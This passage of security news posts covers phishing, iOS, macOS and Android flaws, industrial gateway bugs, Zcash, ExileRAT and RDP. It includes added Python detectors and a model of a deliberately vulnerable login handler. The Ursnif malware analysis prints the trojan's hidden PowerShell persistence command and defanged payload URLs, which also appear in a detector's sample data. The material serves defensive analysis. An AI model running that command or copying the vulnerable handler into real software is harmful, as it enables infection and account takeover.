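        verdict = "ok" if target in expected_hosts else "unexpected-host"
    elif target is None:
        verdict = "translate-wrapped-unknown-target"
    elif target in expected_hosts:
        verdict = "translate-wrapped-expected-host"
    else:
        verdict = "translate-wrapped-suspicious"
    return {"wrapped": wrapped, "target": target, "verdict": verdict}


EXPECTED_LOGIN_HOSTS = {"accounts.google.com", "www.facebook.com"}

# Constructed sample links (reserved .test domain); none of these is a real campaign URL.
SAMPLE_LINKS = [
    "https://accounts.google.com/signin",
    "https://translate.google.com/translate?hl=en&sl=auto&tl=en"
    "&u=https%3A%2F%2Faccounts-login.example-phish.test%2Fsignin",
    "https://accounts--login-example--phish-test.translate.goog/signin",
    "https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Faccounts.google.com%2F",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        r = assess_link(link, EXPECTED_LOGIN_HOSTS)
        print(f"{r['verdict']:36} target={r['target']}  {link}")
```

The point of the check is the one Cashdollar makes: the visible domain is Google’s, so a filter that only looks at the link’s own host passes it. Judging the link by the host the Translate service fetches from restores the comparison a user on a desktop browser can make by eye.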

When the victims provide their Google/Facebook credentials to the phishing page, a script will send them to the attacker via email.

Once they have obtained the victim’s Google credentials, the attackers carry out a second phishing attack to obtain the Facebook credentials as well.

According to Cashdollar, the Facebook phishing page was not as well optimized for mobile and was very easy to spot.

“Some phishing attacks are more sophisticated than others. In this case, the attack was easily spotted the moment I checked the message on my computer in addition to seeing it on my mobile device. However, other, more clever attacks fool thousands of people daily, even IT and Security professionals.” concludes the expert.

“The best defense is a good offense. That means taking your time and examining the message fully before taking any actions.”

Pierluigi Paganini

(SecurityAffairs – phishing, Google Translate)


The post Phishing campaign leverages Google Translate as camouflage appeared first on Security Affairs.

Three out of the four flaws fixed with iOS 12.1.4 were exploited in the wild

Security experts at Google discovered that two of the zero-day vulnerabilities patched by Apple with the release of iOS 12.1.4 were exploited in the wild.

Security researchers at Google revealed that two of the zero-day flaws addressed by Apple with the release of iOS 12.1.4 were exploited in the wild.

Apple iOS 12.1.4 version addresses four vulnerabilities, two issues associated with the FaceTime bug and two memory corruption flaws that could be exploited by attackers to elevate privileges and execute arbitrary code.

The CVE-2019-7287 vulnerability affects the IOKit and it can be exploited by a malicious app to execute arbitrary code with kernel privileges.

“An application may be able to execute arbitrary code with kernel privileges.” reads the security advisory.

“A memory corruption issue was addressed with improved input validation.”

The CVE-2019-7286 vulnerability impacts the Foundation component in iOS, it could allow a malicious application to gain elevated privileges.

“An application may be able to gain elevated privileges” continues the advisory. “A memory corruption issue was addressed with improved input validation.”

The flaws were discovered by Clement Lecigne of Google Threat Analysis Group, and Ian Beer and Samuel Groß of Google Project Zero. Apple also credited an anonymous researcher for the discovery of the vulnerabilities.

Project Zero Team Lead Ben Hawkes revealed that both CVE-2019-7286 and CVE-2019-7287 have been exploited in the wild. Google experts did not reveal technical details on the attacks they observed in the wild.

The popular Google Project Zero white hat hacker Tavis Ormandy confirmed that three of the four vulnerabilities addressed by Apple were exploited by attackers in the wild.

Pierluigi Paganini

(SecurityAffairs – hacking, iOS 12.1.4)

The post Three out of the four flaws fixed with iOS 12.1.4 were exploited in the wild appeared first on Security Affairs.

Hackers broke into Australia’s Parliament Computer Network

Australia’s parliament confirmed that is investigating a suspicious security incident that affected its computer network.

Australia announced an ongoing investigation into an unspecified ‘security incident’ in the federal parliament’s computer network.

“Following a security incident on the parliamentary computing network, a number of measures have been implemented to protect the network and its users,” parliamentary authorities said in a statement.

At the time of writing, authorities have not provided technical details on the security breach; officials said there was no initial evidence that data had been compromised by threat actors.


Representatives of Australia’s Parliament did not release any statement on the attribution of the attack, but operations of this kind are usually associated with nation-state actors.

“We have no evidence that this is an attempt to influence the outcome of parliamentary processes or to disrupt or influence electoral or political processes,” a statement said.

“Our immediate focus has been on securing the network and protecting data and users.”

In response to the incident, the IT staff reset passwords for all parliamentary

The Australian Signals Directorate (ASD) is also investigating the incident; according to the Australian broadcaster ABC, intelligence agencies suspect the involvement of state-sponsored hackers.

“ASD and its Australian Cyber Security Centre will continue to work with (Parliament) to understand the full extent of this network compromise,” an ASD spokesperson told AFP.

“Meanwhile, the necessary steps are being taken to mitigate the compromise and prevent any harm.”

Pierluigi Paganini

(SecurityAffairs – hacking, Australia’s Parliament)

The post Hackers broke into Australia’s Parliament Computer Network appeared first on Security Affairs.

Security Affairs: Vulnerabilities in Kunbus Industrial Gateway allows to control the devices

Security of Industrial system is a top priority, experts found multiple serious flaws in a gateway made by Kunbus that could allow to completely control a device

Nicolas Merle from industrial cybersecurity firm Applied Risk discovered several flaws in a gateway produced by the Germany-based firm Kunbus, some of which could allow an attacker to gain full control of the vulnerable devices. Kunbus gateway solutions are used by several organizations worldwide.

Merle discovered five vulnerabilities in the Kunbus PR100088 Modbus gateways running version 1.0.10232 and likely earlier versions.

Applied Risk has classified two vulnerabilities as “critical” and two as “high severity.”

“An unauthenticated user can change the admin password, use it to get full control of the device, change its configuration and then lock the administrator out. An authenticated user can send a malicious request to the ftp service, stopping the device until the next cold reboot. An attacker able to sniff the traffic would be able to get any password used for login.” reads the security advisory published by Applied Risk.

“An unauthenticated user can see and change the Modbus register value via the web interface and reboot the device with a simple command, creating a denial of service. Finally, an attacker could change the Administrator password to the default one, to trick the operator to input back its password that he could in return recover via the ftp service.”

The gateway is affected by an improper authentication issue (CVE-2019-6527) in the Modbus gateway web application that fails to check that the user is logged in when processing the change of password page.

The CVE-2019-6527 flaw could be exploited by attackers to take complete control of the gateway and lock legitimate admins out.

Exploitation is possible only when an admin user has previously logged in to the vulnerable gateway and the device has not been restarted since.

Another flaw, tracked as CVE-2019-6533, can be exploited by an unauthenticated attacker to read and modify the registers used to store Modbus values from the web interface. The flaw could be exploited by an attacker to cause a denial-of-service (DoS) condition by rebooting the device.

The researcher also found another DoS issue that could be exploited by sending a long request (more than 256 characters) to the FTP service.

Another issue discovered by the researcher is the disclosure of the user password, which is included in the HTTP GET request used in the authentication phase. The password is sent in clear text, so an attacker in a man-in-the-middle (MitM) position can obtain it.
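The two web-interface weaknesses described above, modelled as an added example that is not Kunbus code: a change-password handler that skips the login check (the CVE-2019-6527 pattern) beside a hardened one, plus a check that flags login requests carrying the password in the URL query string. The class, default password and parameter names are constructed for the example.

```python
# Added example, not Kunbus code: a model of the improper-authentication pattern
# behind CVE-2019-6527 next to a handler that enforces the missing checks, plus a
# check for the clear-text password-in-GET disclosure. All names and values are
# constructed for the example.
import hmac
import secrets
from typing import Optional
from urllib.parse import parse_qs, urlsplit


class Gateway:
    """Minimal stand-in for the gateway's admin account and session store."""

    def __init__(self, admin_password: str = "admin") -> None:  # constructed default
        self.admin_password = admin_password
        self.sessions: set = set()

    def login(self, password: str) -> Optional[str]:
        """Return a session token on success, None otherwise (constant-time compare)."""
        if hmac.compare_digest(password.encode(), self.admin_password.encode()):
            token = secrets.token_hex(16)
            self.sessions.add(token)
            return token
        return None


def change_password_vulnerable(gw: Gateway, session: Optional[str], new_password: str) -> bool:
    """Mirrors the flaw described above: the change-password page is processed
    without checking that the caller holds a valid session, so anyone who can
    reach the web interface can set a new admin password and lock the admin out."""
    gw.admin_password = new_password
    return True


def change_password_fixed(gw: Gateway, session: Optional[str],
                          old_password: str, new_password: str) -> bool:
    """Hardened handler: require a valid session, re-verify the current password,
    and invalidate every session once the password changes."""
    if session is None or session not in gw.sessions:
        return False  # unauthenticated request: reject
    if not hmac.compare_digest(old_password.encode(), gw.admin_password.encode()):
        return False  # re-authentication failed
    gw.admin_password = new_password
    gw.sessions.clear()
    return True


CREDENTIAL_PARAMS = {"password", "passwd", "pwd", "pass"}  # constructed list


def password_in_query(request_target: str) -> bool:
    """Flag a login request that carries the password in the URL query string
    (the disclosure described above): such requests end up in proxy and server
    logs and are readable by anyone on the path."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    return any(name.lower() in CREDENTIAL_PARAMS for name in query)


if __name__ == "__main__":
    gw = Gateway()
    change_password_vulnerable(gw, None, "attacker-chosen")
    print("admin locked out by unauthenticated change:", gw.login("admin") is None)
    gw = Gateway()
    print("hardened handler rejects unauthenticated change:",
          not change_password_fixed(gw, None, "admin", "x"))
    print("password in GET query:", password_in_query("/login.cgi?user=admin&password=x"))
```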


Kunbus addressed four of the flaws with the release of version 1.1.13166 (Security Update R02). The remaining flaw affects the FTP service that can be used to retrieve user credentials stored on the device in clear text in an XML file. This latter issue is expected to be fixed at the end of February with the Security Update R03.

ICS-CERT and Kunbus also published security advisories describing the flaws.

Pierluigi Paganini

(SecurityAffairs – Kunbus, hacking)


The post Vulnerabilities in Kunbus Industrial Gateway allows to control the devices appeared first on Security Affairs.




Security Affairs: Expert publicly disclosed the existence of 0day flaw in macOS Mojave

A zero-day vulnerability in macOS Mojave can be exploited by malware to steal plaintext passwords from the Keychain.

The security expert Linus Henze has disclosed the existence of a zero-day vulnerability in macOS Mojave that can be exploited by malware to steal plaintext passwords from the Keychain. According to Henze, the flaw affects macOS Mojave and earlier versions.

The researcher did not report the vulnerability to Apple; he publicly disclosed the existence of the flaw without making its details public.

Henze has published a video PoC for the flaw that shows how malware can extract passwords from the local Keychain password management system. The attack works on a system running the latest macOS Mojave version (10.14.3).

The attack is sneaky because it requires admin privileges for neither the malicious app nor the user account. The expert pointed out that the malicious code could exploit the flaw to steal passwords only from that user’s Keychain, because other Keychains are locked.


Why did Henze not report the flaw to Apple?

Simple: the expert explained that he did not share his discovery with the tech giant because the company doesn’t operate a bug bounty program for macOS. Apple contacted the expert after the publication of the video asking for more details about the issue, but Henze refused to provide them without a bounty.

Currently, Apple’s bug bounty program only covers hardware, iOS and iCloud.

The popular macOS expert and former NSA white hat hacker Patrick Wardle also confirmed that the exploit works.

Pierluigi Paganini

(SecurityAffairs – MacOS Mojave, hacking)

The post Expert publicly disclosed the existence of 0day flaw in macOS Mojave appeared first on Security Affairs.




Ursnif: Long Live the Steganography and AtomBombing!

Yoroi ZLab – Cybaze uncovered a new wave of Ursnif attacks using a variant that implements an exotic process injection technique called AtomBombing

Another wave of Ursnif attacks hits Italy.

Ursnif is one of the most active banking trojans. It is also known as GOZI; in fact, it is a fork of the original Gozi-ISFB banking Trojan, whose source code was leaked in 2014, and it has updated and evolved the Gozi features over the years. In this variant too, Ursnif uses a weaponized Office document with an embedded VBA macro that acts as a dropper, followed by multi-stage, highly obfuscated PowerShell scripts that hide the real payload. In addition, this Ursnif variant also uses steganography to hide the malicious code and avoid AV detection.

Moreover, this variant uses an exotic process injection technique called AtomBombing (through QueueUserAPC), which abuses the Windows atom table in order to inject into explorer.exe in a stealthier way, because no remote threads are created in the target process.

Technical Analysis

The initial infection vector appears as a corrupted Excel file, inviting the user to enable macro execution to properly view the contents of the fake document, typically a purchase order, an invoice and so on.

Figure 1. Ursnif macro-weaponized document.

Extracting the macro code shows that the malware first checks the victim’s country using the Application.International MS Office property. If the result corresponds to Italy (code 39), the macro executes the next command using the Shell function.

Figure 2. Part of Visual Basic macro code.

The remaining functions of the macro are used to prepare the shell command to launch, concatenating several strings encoded in different ways (mainly in decimal and binary). The resulting command contains a huge binary string, which will be converted into a new Powershell command using the function:

[Convert]::ToInt16() -as[char]

Figure 3. Powershell script deployed by macro code.

As shown in the above figure, the malware tries to download an image from at least one of two embedded URLs:

  • https://images2.imgbox[.]com/55/c4/rBzwpAzi_o.png
  • https://i.postimg[.]cc/PH6QvFvF/mario.png?dl=1

The apparently legitimate image actually contains a new PowerShell command. The weaponized image is crafted using the Invoke-PSImage script, which allows embedding the bytes of a script into the pixels of a PNG file.

Figure 4. Powershell script hidden into “Fancy Mario”’s image.

Et voilà, another obfuscated Powershell stage. The payload is encoded in Base64, so it is easy to move on and reveal the next code.

Figure 5. Another stage of deobfuscation process.

The payload appears to be hexadecimal-encoded and can be decoded through the previous [Convert]::ToInt16 function.

The final code is:

Figure 6. Powershell script downloading the Ursnif loader.

It executes another check against the victim’s country, ensuring it is Italy. The information derives from the command:

Get-Culture | Format-List -Property *

If the check is positive, the script will download an EXE payload from http://fillialopago[.]info/~DF2F63, store it in %TEMP%\Twain001.exe and then execute it.

At analysis time, the file was not detected by most antivirus engines:

Figure 7. Ursnif loader detection rate

Despite its low detection, this executable is a classic Ursnif loader, responsible for contacting the server to download the malicious binary that will be injected into the explorer.exe process. It uses the IWebBrowser.Navigate function to download data from its malicious server felipllet[.]info with a URI path that looks like a path to a video file (.avi).

Figure 8. IWebBrowser.Navigate function invocation.

The server responds to this request by sending encrypted data, as shown in the following figure.

Figure 9. Part of network traffic containing some encrypted data.

After a decryption routine, all useful data is stored into registry keys at HKCU\Software\AppDataLow\Software\Microsoft\{GUID}.

Figure 10. Registry keys set by the malware.

The registry value named “defrdisc” (whose name resembles the legitimate Disk Defragmentation Utility) contains the command that will be executed as the next step and at Windows startup, as displayed below.

Figure 11. Command executed at machine’s startup.

The command’s only goal is to execute the data contained in the “cmiftall” registry value through the PowerShell engine.

C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create “powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E’).cmiftall))”

The “cmiftall” data is simply a hex-encoded PowerShell script, so it is possible to reconstruct its behavior.
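An added example, not part of the Yoroi ZLab – Cybaze analysis, that reverses the two string encodings used along the chain described above (the per-chunk `[Convert]::ToInt16(...) -as [char]` decoding of the macro's binary and decimal strings, and the hex-encoded script in the “cmiftall” registry value) and runs a detector for the wmic/PowerShell startup command over constructed process-creation telemetry. The encoded samples decode to the benign string `Get-Culture`; the registry GUID is the one from the analysed sample.

```python
# Added example, not from the Yoroi ZLab - Cybaze analysis: decoders for the
# string encodings used along the Ursnif chain and a detector for the persistence
# command line. Encoded samples and telemetry lines are constructed.
import re
from typing import Dict, List, Optional


def decode_toint16_chars(encoded: str, base: int, sep: str = " ") -> str:
    """Python equivalent of `[Convert]::ToInt16($chunk, $base) -as [char]`
    applied to every separated chunk (the macro uses base 2 and base 10)."""
    return "".join(chr(int(chunk, base)) for chunk in encoded.split(sep) if chunk)


def decode_hex_script(hex_blob: str) -> str:
    """Decode a hex-encoded PowerShell script such as the 'cmiftall' value;
    the sample stores plain ASCII, which is what this assumes."""
    return bytes.fromhex(re.sub(r"\s+", "", hex_blob)).decode("ascii")


# Constructed samples: both decode to the benign string "Get-Culture".
SAMPLE_BINARY = ("01000111 01100101 01110100 00101101 01000011 01110101 "
                 "01101100 01110100 01110101 01110010 01100101")
SAMPLE_HEX = "4765742d43756c74757265"

# --- persistence detection -------------------------------------------------
REG_KEY_RE = re.compile(
    r"HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\([0-9A-Fa-f-]{36})",
    re.IGNORECASE)


def is_ursnif_persistence(cmdline: str) -> bool:
    """True when a command line matches the startup command described above:
    wmic spawning a hidden PowerShell that iex()es a registry value stored
    under HKCU\\Software\\AppDataLow."""
    c = cmdline.lower()
    required = ("wmic", "process call create", "powershell",
                "get-itemproperty", "appdatalow")
    return all(m in c for m in required) and ("iex" in c or "invoke-expression" in c)


def scan_cmdlines(cmdlines: List[str]) -> List[Dict[str, Optional[str]]]:
    """Run the detector over process-creation command lines and report the
    registry key GUID the payload is loaded from, when one can be extracted."""
    hits = []
    for line in cmdlines:
        if is_ursnif_persistence(line):
            m = REG_KEY_RE.search(line)
            hits.append({"cmdline": line, "regkey_guid": m.group(1) if m else None})
    return hits


# Constructed telemetry; the third line mirrors the launcher quoted in the
# analysis, with the GUID taken from that sample.
SAMPLE_CMDLINES = [
    "wmic process list brief",
    "powershell -NoProfile -Command Get-Culture",
    r'C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create '
    r'"powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty '
    r"'HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E'"
    r').cmiftall))"',
]


if __name__ == "__main__":
    print("binary chunks  ->", decode_toint16_chars(SAMPLE_BINARY, 2))
    print("hex blob       ->", decode_hex_script(SAMPLE_HEX))
    for hit in scan_cmdlines(SAMPLE_CMDLINES):
        print("persistence hit, registry GUID:", hit["regkey_guid"])
```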

Figure 12. Powershell script used to inject the final binary through the APC Injection technique.

So, using the PowerShell script stored in the registry key (shown above), Ursnif is able to allocate enough space for its malicious byte array, containing the final payload, and to start it as a thread of a legitimate process through the QueueUserAPC and SleepEx calls.

Ursnif’s complete workflow is shown in the following figure:

Figure 13. Ursnif’s workflow.

Finally, from the data contained in the last script’s byte array, it is possible to extract a DLL, which corresponds to what Ursnif injects into the explorer.exe process.

This DLL seems to be corrupted, as stated by some static analysis tools:

Figure 14. Info about the malformed DLL.

However, when it is loaded in memory using APC injection technique, it works with no problems. Submitting the file to VirusTotal, the result is devastating: 0/56 anti-malware detects it.

Figure 15. Final DLL’s detection rate.

Conclusions

As we first noted in our previous Ursnif analysis in December 2018, and as Cisco Talos Intelligence reported in January 2019, this new Ursnif sample also uses the same APC injection technique to load its final binary into the explorer.exe process, along with obfuscation and steganography in order to hide its malicious behaviour. Ursnif is more active and widespread than ever: the contacted C2 is no longer reachable, but the malware implant is still alive because the crooks constantly change their C2 to divert tracking and analysis.

Yoroi ZLab – Cybaze researchers are continuing the analysis of this undetected DLL in order to extract information and evidence to share with the research community.

Further information, including IoCs and Yara rules are reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – Ursnif, malware)

The post Ursnif: Long Live the Steganography and AtomBombing! appeared first on Security Affairs.

Android devices could be hacked by viewing a malicious PNG Image

Google patched a critical flaw in its Android OS that allows an attacker to send a specially crafted PNG image file to hack a target device.

Opening an image file on your smartphone could allow attackers to hack into your Android device due to three critical vulnerabilities: CVE-2019-1986, CVE-2019-1987, and CVE-2019-1988.

The flaws affect millions of Android devices running versions of the Google OS, ranging from Android 7.0 Nougat to the latest Android 9.0 Pie.

Google addressed the three vulnerabilities in the Android Open Source Project (AOSP) as part of the February Android Security Updates.


Even if Google has addressed the flaws, each vendor will have to distribute the patch for its models and this process usually doesn’t occur on a regular basis.

Researchers at Google did not provide technical details for the flaws, the tech giant only reported that the security updates addressed a “heap buffer overflow flaw,” “errors in SkPngCodec,” and vulnerabilities in some components that render PNG images.

According to the security advisory published by Google, the most severe of the three vulnerabilities could allow a maliciously crafted .PNG image file to execute arbitrary code on the vulnerable Android devices.

“The most severe of these issues is a critical security vulnerability in Framework that could allow a remote attacker using a specially crafted PNG file to execute arbitrary code within the context of a privileged process.” reads the security bulletin.

“The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.”

Experts pointed out that an attacker could exploit the flaw by tricking potential victims into opening a maliciously crafted PNG image file on their Android.

The malicious image could be sent through a mobile message service or an email app.

Google addressed three critical flaws in the Framework component; the overall number of critical issues is 11. The tech giant addressed a total of 42 flaws, 30 of which were rated high severity.

Google fixed four flaws in Android components manufactured by NVIDIA and five by the chip maker Qualcomm.

The good news is that Google is not aware of active exploitation of the flaws addressed by the company in the wild.

Google reported the flaws to its partners in January.

“Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP. ” concludes Google.

Pierluigi Paganini

(SecurityAffairs – Android, PNG)

The post Android devices could be hacked by viewing a malicious PNG Image appeared first on Security Affairs.

Security Affairs: Security expert Marco Ramilli released for free the Malware Hunter tool

Malware researcher Marco Ramilli released for free the Malware Hunter tool, a simple but interesting catching tool based on static YARA rules.

I’ve been working on cybersecurity for more than 10 years. During my career, I’ve held numerous roles which had me facing many problems: I had to solve technical issues as well as management, economic and financial ones. Every time I needed a “tool” to help a decision or to solve a technical question I started by seeking on “sourceforge/github” looking for something that would fit my needs. If what I needed wasn’t there, I’ve always built it on my own by using what was available at that time. Nowadays, those tools are still producing data which I believe might be useful to many people. Today I’d like to introduce to you a simple but interesting malware catching tool based on static YARA rules that is available HERE.

It takes sample feeds and it analyses them against hundreds of YARA rules. Some of them are publicly available, some others have been written on my own. The engine is quite slow right now, but it has analysed several recent samples. You might decide to get deep into the last processed samples by clicking on a table row (which highlights the last 10 processed samples) or to search for a specific hash by pasting your desired sha256 and clicking on the “Search” button.

In both cases, a modal form will appear showing the rules that match the hash you asked for. Since it’s a personal platform it could be quite slow so far. Hope you enjoy it! Have fun.

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from the University of Bologna. During my PhD program I worked for the US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing the uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I’ve ever experienced! Now I technically lead Yoroi defending our customers, strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – MartyMcFly, malware)

The post Security expert Marco Ramilli released for free the Malware Hunter tool appeared first on Security Affairs.




A critical counterfeiting vulnerability addressed in Zcash

A critical counterfeiting vulnerability in Zcash cryptocurrency could have allowed coining an infinite number of Zcash (ZEC) cryptocurrency.

Reading some news, investors could believe that cryptocurrencies are not a good investment. A few days ago, the QuadrigaCX Bitcoin exchange announced that it had lost USD 145 million worth of cryptocurrency because the only person with access to its cold storage had died.

News of the day is that a critical vulnerability in Zcash cryptocurrency could have allowed coining an infinite number of Zcash (ZEC) cryptocurrency.

The Zcash development team has discovered and addressed the shocking critical flaw.

The Zcash cryptocurrency was presented in October 2016; compared with the popular Bitcoin, it ensures total anonymity because each participant in a transaction remains hidden.

With this premise, the Zcash has immediately attracted great interest from investors, miners and of course cybercriminals.


The Zerocoin Electric Coin Company, which developed Zcash, disclosed the counterfeiting flaw that was discovered by its cryptographer Ariel Gabizon. Gabizon discovered the flaw in the Zcash code on 1st March 2018, just before a talk at the Financial Cryptography conference.

Gabizon immediately reported the flaw to Sean Bowe, a Zcash Company cryptographer, and the development team decided not to disclose the issue to avoid abuse.

Zcash revealed that the flaw was known only by four Zcash employees before it addressed the issue with a patch implemented in the Zcash network on 28th October 2018.

“To exploit the counterfeiting vulnerability, an attacker would have needed to possess information found in the large MPC protocol transcript that was made available shortly after the launch of Zcash.” reads the post published by the company.

“This transcript had not been widely downloaded and was removed from public availability immediately upon discovery of the vulnerability to make it more difficult to exploit.”

Experts at ZCash explained that the exploitation of the vulnerability would have required a high level of technical and cryptographic sophistication, and only a few people have it. The company excluded that attackers have already exploited the counterfeiting flaw.

The counterfeiting vulnerability affected a variant of zk-SNARKs, the implementation of zero-knowledge cryptography Zcash used to encrypt and protect the transactions. zk-SNARKs was also implemented in other different projects.

Komodo blockchains and Horizen were affected by the same flaw and reportedly addressed it after being informed of the issue by Zcash experts in mid-November 2018.

The vulnerability was the result of a “parameter setup algorithm” that allowed “a cheating prover to circumvent a consistency check” and thereby transformed “the proof of one statement into a valid-looking proof of a different statement.”

Experts pointed out that an attacker with access to the multi-party computation (MPC) ceremony transcript (used to set up the privacy features for Zcash) would have been able to create false proofs that falsely convince the original Sprout zk-SNARK verifier of the correctness of a transaction.

The Zcash development team confirmed that the flaw had existed in the cryptocurrency scheme for years.

“The vulnerability had existed for years but was undiscovered by numerous expert cryptographers, scientists, third-party auditors, and third-party engineering teams who initiated new projects based upon the Zcash code.” reported the company.

“The Zcash Company has seen no evidence that counterfeiting has occurred as might be discovered by monitoring the total amount of Zcash held in Sprout addresses (i.e., the Sprout shielded pool). As long as the value in the shielded pools is greater than zero, no counterfeiting has been detected.”

Pierluigi Paganini

(SecurityAffairs – ZCash counterfeiting vulnerability, hacking)

The post A critical counterfeiting vulnerability addressed in Zcash appeared first on Security Affairs.

New ExileRAT backdoor used in attacks aimed at users in Tibet

A malware campaign using the new LuckyCat-linked RAT dubbed ExileRAT has been targeting the mailing list of the organization officially representing the Tibetan government-in-exile.

Security experts at Talos group have uncovered a malware campaign using the ExileRAT backdoor to target the mailing list of the organization officially representing the Tibetan government-in-exile.

Threat actors are delivering the malware via a weaponized Microsoft PowerPoint document, the messages are reaching people in a mailing list run by the Central Tibetan Administration (CTA).


The nature of the malware and of the targets suggests the involvement of a nation-state actor carrying out a cyber espionage campaign.

Given the nature of the threat and the targets, the campaign was likely designed for espionage purposes, Talos’ security researchers say.

The bait PowerPoint document is a copy of a legitimate PDF available on CTA’s website; it was sent by the attackers to all subscribers of the CTA mailing list.

“Cisco Talos recently observed a malware campaign delivering a malicious Microsoft PowerPoint document using a mailing list run by the Central Tibetan Administration (CTA), an organization officially representing the Tibetan government-in-exile.” reads the analysis published by Talos.

“The document used in the attack was a PPSX file, a file format used to deliver a non-editable slideshow derived from a Microsoft PowerPoint document.”

The experts received an email message from the CTA mailing list containing an attachment, “Tibet-was-never-a-part-of-China.ppsx,” the researchers noticed that the standard Reply-To header used by the CTA mailings was modified to redirect responses to an email address (mediabureauin [at] gmail.com) controlled by the hackers.

The weaponized document exploits the CVE-2017-0199 flaw, a zero-day arbitrary code execution vulnerability fixed by Microsoft in April 2017 that has been actively exploited in attacks in the wild.

The exploit code used by the attackers originated from a public script available on GitHub. The researchers also noticed that the PPSX attempts to contact iplocation to perform some geo-location lookups.

It connects to the command and control (C&C) server to receive a JavaScript script responsible for downloading the final payload. 

The malicious code is executed via WScript while also using cmd.exe to create a scheduled task called “Diagnostic_System_Host,” a name similar to the legitimate system task name “Diagnostic System Host” but with underscores in place of spaces.
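The underscore-for-space trick above is easy to hunt for once you normalise task names before comparing them. The following is an added example, not Talos’ code: it flags any scheduled task whose name collapses to a known legitimate name without being that exact name. The allow-list and the sample task names are constructed for the example.

```python
"""Flag scheduled-task names that impersonate legitimate Windows tasks.

Added example (not Talos' tooling).  ExileRAT registered a task called
"Diagnostic_System_Host", which differs from the legitimate
"Diagnostic System Host" only by its separators.  We normalise names by
collapsing spaces, underscores, hyphens and dots and folding case, then
report any task whose normalised form matches a known-good name while
the raw name does not.
"""
import re

# Constructed allow-list of legitimate task names (example only).
KNOWN_GOOD = {
    "Diagnostic System Host",
    "Windows Defender Scheduled Scan",
}


def normalize(name: str) -> str:
    """Collapse separator runs to one space and fold case, so that
    'Diagnostic_System_Host' and 'diagnostic-system-host' both compare
    equal to 'Diagnostic System Host'."""
    return re.sub(r"[\s_\-.]+", " ", name).strip().casefold()


def impersonated_name(task_name: str, known_good=KNOWN_GOOD):
    """Return the legitimate name that task_name imitates, or None.

    An exact known-good name is not an impostor; only a name that is
    *different* yet normalises to a known-good entry is reported."""
    if task_name in known_good:
        return None
    norm = normalize(task_name)
    for good in known_good:
        if normalize(good) == norm:
            return good
    return None


def find_lookalikes(task_names, known_good=KNOWN_GOOD):
    """Return [(suspicious_name, legitimate_name), ...] for a task list."""
    hits = []
    for name in task_names:
        target = impersonated_name(name, known_good)
        if target is not None:
            hits.append((name, target))
    return hits


# Constructed sample, as the task names might appear in a
# `schtasks /query` export (names only, example data).
SAMPLE_TASKS = [
    "Diagnostic System Host",
    "Diagnostic_System_Host",
    "Backup Daily",
    "diagnostic-system-host",
]

if __name__ == "__main__":
    for bad, good in find_lookalikes(SAMPLE_TASKS):
        print(f"suspicious task {bad!r} mimics {good!r}")
```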

The ExileRAT used in this campaign supports commands to retrieve system information (i.e. computer name, username, drive listing, network adapters, and process names), exfiltrate data, and execute or terminate processes.

Talos pointed out that C2 infrastructure has been used in multiple campaigns, including attacks against Tibetan activists leveraging a newer version of the LuckyCat Android RAT.

“This newer version includes the same features as the 2012 version (file uploading, downloading, information stealing and remote shell) and adds several new features, including file removing, app execution, audio recording, personal contact stealing, SMS stealing, recent call stealing and location stealing.” continues the report.

Experts conclude that this new campaign represents an “evolution in a series of attacks targeting a constituency of political supporters, and further evidence that not all attacks require the use of zero-day vulnerabilities,” Talos says. 

The good news is that attackers leveraged an old issue that could be easily detected by up-to-date defense systems. 

Pierluigi Paganini

(SecurityAffairs – hacking, Exilerat)

The post New ExileRAT backdoor used in attacks aimed at users in Tibet appeared first on Security Affairs.

Reverse RDP Attack – Rogue RDP Server can be used to hack RDP clients

Researchers at Check Point Software Technologies have discovered more than two dozen vulnerabilities in the popular implementations of the remote desktop protocol (RDP).

Security experts at Check Point Software Technologies discovered a total of 25 security flaws in popular implementations of the remote desktop protocol (RDP), 16 of which have been rated as “major.” Some of the vulnerabilities could be exploited by a malicious RDP server to hack a device running the RDP client software.

Remote Desktop Protocol (RDP) is a widely adopted protocol for remote administration, but it could dramatically enlarge the attack surface if it isn’t properly managed.


Researchers have focused their analysis on FreeRDP, rdesktop, and the Remote Desktop Connection implemented in Windows OS.

“Used by thousands of IT professionals and security researchers worldwide, the Remote Desktop Protocol (RDP) is usually considered a safe and trustworthy application to connect to remote computers.” reads the analysis published by the experts.

“However, Check Point Research recently discovered multiple critical vulnerabilities in the commonly used Remote Desktop Protocol (RDP) that would allow a malicious actor to reverse the usual direction of communication and infect the IT professional or security research’s computer. Such an infection could then allow for an intrusion into the IT network as a whole. 16 major vulnerabilities and a total of 25 security vulnerabilities were found overall.”

The analysis of rdesktop, an older open-source RDP client that ships by default in Kali Linux distributions, revealed the presence of 19 vulnerabilities, most of them heap-based buffer overflows.

11 of these were rated as “major” issues; some of the flaws can be exploited by a rogue RDP server under the control of the attacker to remotely execute code on an RDP client connecting to it.

The situation is better for FreeRDP, the most popular and mature open-source RDP client on GitHub, because the experts discovered only six vulnerabilities, five of which have a major impact.

